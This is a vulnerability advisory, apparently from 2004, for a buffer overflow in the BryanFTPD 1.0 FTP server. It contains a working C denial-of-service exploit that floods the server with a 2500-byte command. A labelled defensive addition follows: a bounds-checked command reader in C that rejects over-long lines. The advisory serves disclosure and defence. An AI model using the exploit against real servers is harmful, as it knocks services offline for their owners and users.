BryanFTPD buffer overflow.
5c41499654781b84c7c2893b0071582e31f52dfc20f77962a16df876a94ad8e2
[--------------------- BryanFTPD v. 1.0 Buffer Overflow --------------------]
Advisory: #1 by unl0ck team
Author: D4rk Eagle (darkeagle@list.ru)
Overview:
-------------------------------------------------------------------------
| FTP Server |
| |
| By: Bryan Cairns |
| |
| This is an encapsulation of the ICS - Internet Component Suite. |
| ICS can be found at : http://users.swing.be/francois.piette/indexuk.htm |
| Please take the time to look at the code and learn something. |
| If you're a Delphi Pro, you can probably give me some tips as I am still |
| new to Delphi programming. |
| |
| Bryan Cairns |
| cairnsb@ameritech.net |
-------------------------------------------------------------------------
This daemon has no website. The server is written in Delphi. Many people may
say that Delphi is protected against buffer overflows, but the bug is in the
ICS component.
Bug version:
BryanFTPD v. 1.0.
Vulnerability:
If you send an overly long FTP command, the server goes down.
DoS exploit:
/*
*********************************************************
* DOS EXPLOIT FOR BryanFTPD v.1.0 *
* written by D4rk Eagle *
* *
*********************************************************
*/
#include <stdio.h>
#include <winsock2.h>

int main(int argc, char *argv[])
{
    WSADATA wsa;
    SOCKET sock;
    struct sockaddr_in addr;
    char data[2500];
    int i; // counter ;)

    //-------- BEGIN ;)
    WSAStartup(MAKEWORD(2,0), &wsa);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(21); // Default is 21 Port (You may Change)
    addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    connect(sock, (struct sockaddr *)&addr, sizeof(addr));

    // fill the buffer with 2500 'A' bytes: the overly long command
    for (i = 0; i < 2500; i++)
        data[i] = 'A';
    send(sock, data, sizeof(data), 0);

    closesocket(sock);
    WSACleanup();
    return 0;
}
[--------------------------------------------------------------------------]
25/06/04.
(c) unl0ck team [http://unl0ck.host.kz]
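
The fix for the condition described under "Vulnerability" is a command reader that checks its bound before every store. The following is an added example in C, not code from the advisory, from BryanFTPD or from ICS; the 512-byte limit and all names (ftp_line_reader, ftp_reader_feed, ftp_reader_demo) are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

#define FTP_MAX_LINE 512 /* assumed limit, not taken from the advisory */
enum ftp_line_status { FTP_NEED_MORE, FTP_LINE_READY, FTP_LINE_TOO_LONG };
struct ftp_line_reader {
    char   buf[FTP_MAX_LINE + 1]; /* +1 for the terminating NUL */
    size_t len;                   /* bytes stored for the current line */
    int    discarding;            /* nonzero while skipping a rejected line */
};

/* Consume input up to the first complete or rejected line; *used = bytes taken. */
enum ftp_line_status ftp_reader_feed(struct ftp_line_reader *r,
                                     const char *data, size_t n, size_t *used)
{
    *used = 0;
    for (size_t i = 0; i < n; i++) {
        char c = data[i];
        *used = i + 1;
        /* drop the tail of a rejected line, up to and including its newline */
        if (r->discarding) { r->discarding = (c != '\n'); continue; }
        if (c == '\n') {              /* complete line: strip CR, terminate */
            if (r->len > 0 && r->buf[r->len - 1] == '\r') r->len--;
            r->buf[r->len] = '\0';
            r->len = 0;
            return FTP_LINE_READY;
        }
        if (r->len == FTP_MAX_LINE) { /* bound check before every store */
            r->len = 0; r->discarding = 1;
            return FTP_LINE_TOO_LONG; /* caller replies 500 or disconnects */
        }
        r->buf[r->len++] = c;
    }
    return FTP_NEED_MORE;
}

/* Constructed input: 2500 filler bytes, then a valid NOOP command.
 * Returns the number of rejected lines; the last accepted line is in r->buf. */
int ftp_reader_demo(struct ftp_line_reader *r)
{
    char in[2508];
    size_t off = 0, used = 0;
    int rejected = 0;
    memset(in, 'A', 2500);
    memcpy(in + 2500, "\r\nNOOP\r\n", 8);
    memset(r, 0, sizeof *r);
    while (off < sizeof in) {
        if (ftp_reader_feed(r, in + off, sizeof in - off, &used) == FTP_LINE_TOO_LONG)
            rejected++;
        off += used;
    }
    return rejected;
}
```

Memory use stays fixed at FTP_MAX_LINE + 1 bytes per connection however much data arrives before the newline, and the session remains usable for the next command.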